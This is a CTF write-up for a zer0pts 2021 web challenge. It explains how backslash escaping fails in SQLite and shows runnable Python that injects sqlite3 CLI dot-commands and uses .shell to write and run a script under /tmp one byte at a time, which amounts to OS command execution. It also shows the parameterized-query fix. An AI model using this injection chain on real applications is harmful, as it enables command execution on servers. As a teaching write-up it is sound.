zer0pts CTF 2021
web
templates/index.html is as below. To obtain the flag, you need to be logged in as admin, or read the content of the template file.

SQL injection in /login seems to be prevented by escaping the input. It is worth noting that the query is executed through subprocess.Popen, i.e. the sqlite3 command-line shell, even though Python supports the sqlite3 module. sqlite3_escape escapes every character except _.\sa-zA-Z0-9 by prepending a backslash. However, SQLite3 has no backslash escapes: in a string literal, ' and " are escaped by writing the character twice, so a prepended backslash is just another ordinary character and the quote still closes the literal.
Because of this behavior, when you input a double quote (") as username in /login, the escaped value \" still terminates the literal and breaks the SQL structure.
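As an added illustration of this escaping mismatch (my code, not the challenge's or the writeup's): backslash_escape below is reconstructed from the description above, the double-quoted query shape is an assumption, and the admin/secret row is constructed sample data. Run against Python's built-in sqlite3 module, it shows that a lone " still breaks the statement after backslash escaping, while doubling the quote or binding parameters does not.

```python
import re
import sqlite3

# Assumption: reconstruction of the challenge's sqlite3_escape from the description
# above (backslash before every character outside _.\sa-zA-Z0-9); the real function
# is not shown on this page.
def backslash_escape(s):
    return re.sub(r"[^_.\sa-zA-Z0-9]", lambda m: "\\" + m.group(0), s)

# What SQLite actually understands inside a double-quoted token: a doubled quote.
def doubling_escape(s):
    return s.replace('"', '""')

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'secret')")  # constructed sample row
    return db

def dqs_enabled():
    # Double-quoted string literals are a legacy SQLite misfeature (SQLITE_DQS); a
    # build may have them compiled out, in which case "admin" is an unknown column.
    try:
        row = make_db().execute('SELECT "surely_not_a_column"').fetchone()
        return row[0] == "surely_not_a_column"
    except sqlite3.OperationalError:
        return False

def login(username, password, escaper):
    # Assumption: the app interpolates both values into double-quoted literals.
    query = 'SELECT username FROM users WHERE username="{}" AND password="{}"'.format(
        escaper(username), escaper(password))
    try:
        rows = make_db().execute(query).fetchall()
        return {"query": query, "rows": rows, "error": None}
    except sqlite3.OperationalError as e:
        # With the backslash escaper, a lone " leaves an unterminated quoted token.
        return {"query": query, "rows": None, "error": str(e)}

def login_parameterized(username, password):
    # The real fix: let the driver bind values; no escaping rules to get wrong.
    return make_db().execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchall()

if __name__ == "__main__":
    for esc in (backslash_escape, doubling_escape):
        r = login('"', "x", esc)
        print(esc.__name__, "->", r["query"], "|", r["error"] or r["rows"])
    print(login_parameterized('"', "x"))
```

On a SQLite build compiled with SQLITE_DQS=0, double-quoted values are not accepted as literals at all, so the "normal" login through the formatted query fails too; dqs_enabled() tells you which kind of build you are on. The injection result does not depend on it: the unterminated quote is a tokenizer error either way.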
By breaking the SQL structure, you can place further characters after the ". It is important that LF (U+000A) is also usable, since \s is in the allowed class: in the CLI version of SQLite3, combining " with ; terminates the SQL statement on the current line, and the next line can be another query or an SQLite3 dot-command. For example, if you input ";\n.tables\n as username, the .tables command is executed as below.
However, as you can see in the code below, if anything is written to stderr, the stdout output is not returned to you.
Let's look for a command that bypasses this restriction. Going through the .help output, you can find the .shell command, which runs OS commands.
Although there is a limit on the length of username, you can bypass it by writing the payload to a file somewhere under /tmp character by character and then executing that script, as below.
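The whole chain above, as an added example that replays it against a local sqlite3 CLI (my code, not the challenge's or the author's): the escaper and the double-quoted query shape are reconstructed assumptions, the per-byte printf octal encoding and the max_len of 100 are my choices (the writeup names neither the command it used nor the actual limit), and the users row and the echo script are constructed. It needs the sqlite3 binary on PATH and exercises the .tables injection, the stderr-hides-stdout rule, and the .shell write-then-execute bypass.

```python
import os
import re
import shutil
import sqlite3
import subprocess
import tempfile

# Assumption: reconstruction of the challenge's escaper from the description above
# (backslash before every character outside _.\sa-zA-Z0-9). Note that \s admits LF
# and that the backslash itself is outside the class, so it gets doubled.
def sqlite3_escape(s):
    return re.sub(r"[^_.\sa-zA-Z0-9]", lambda m: "\\" + m.group(0), s)

# Assumption: the app interpolates both fields into double-quoted literals.
def build_query(username, password):
    return 'SELECT username FROM users WHERE username="{}" AND password="{}";'.format(
        sqlite3_escape(username), sqlite3_escape(password))

def cli_available():
    return shutil.which("sqlite3") is not None

def sqlite3_cli_query(db_path, query):
    # Feed the query to the sqlite3 CLI over stdin, as a subprocess.Popen-based app
    # would, and return both streams.
    p = subprocess.Popen(["sqlite3", db_path], stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, err = p.communicate(query.encode())
    return out.decode(errors="replace"), err.decode(errors="replace")

def app_response(stdout, stderr):
    # The rule observed in the writeup: anything on stderr hides stdout.
    return None if stderr else stdout

def shell_chunks(script, target, max_len):
    # One username per byte of `script`, each appending that byte to `target`
    # via `.shell printf`, followed by a final username that runs the file.
    # Each byte travels as an octal escape: the two backslashes written here
    # become four after the escaper, the CLI's own backslash resolution in
    # dot-command arguments halves them to two (and turns the escaped \> and \/
    # back into > and /), sh halves them to one, and printf decodes \NNN.
    chunks = ['";\n.shell printf \\\\%03o >> %s\n' % (b, target) for b in script.encode()]
    chunks.append('";\n.shell sh %s\n' % target)
    for c in chunks:
        if len(c) > max_len:
            raise ValueError("payload %r exceeds the %d-char limit" % (c, max_len))
    return chunks

def demo(max_len=100):
    work = tempfile.mkdtemp()
    db = os.path.join(work, "db.sqlite3")
    conn = sqlite3.connect(db)
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'secret')")  # constructed row
    conn.commit()
    conn.close()
    results = {}
    # 1. a normal login round-trips through the CLI
    out, err = sqlite3_cli_query(db, build_query("admin", "secret"))
    results["login"] = (out.strip(), err)
    # 2. the injected " closes the literal and \; still ends the line, so the CLI
    #    treats the (now broken) first line as a finished statement, then runs
    #    .tables as a dot-command; the broken line and the dangling tail go to stderr
    out, err = sqlite3_cli_query(db, build_query('";\n.tables\n', "x"))
    results["tables_in_stdout"] = "users" in out
    results["stderr_nonempty"] = err != ""
    results["app_shows"] = app_response(out, err)
    # 3. .shell, one byte per login, then execute the assembled script
    script_path = os.path.join(work, "p")
    marker = os.path.join(work, "done")
    script = "echo pwned > %s\n" % marker
    for username in shell_chunks(script, script_path, max_len):
        sqlite3_cli_query(db, build_query(username, "x"))
    results["written"] = os.path.exists(script_path) and open(script_path).read() == script
    results["executed"] = os.path.exists(marker)
    shutil.rmtree(work)
    return results

if __name__ == "__main__":
    print(demo() if cli_available() else "sqlite3 CLI not on PATH")
```

The first line the CLI sees is SELECT ... username="\"\; : the injected quote closes the literal, the stray backslash is just an illegal token, and the semicolon makes sqlite3_complete() treat the line as a finished statement. It fails (that is the stderr output), the buffer is cleared, and the following line starts with a dot, so it is dispatched as a dot-command. Because the app's escaper also backslashes > and /, the .shell payload relies on the CLI resolving backslash escapes in dot-command arguments; count the backslashes against whatever escaper you are really facing.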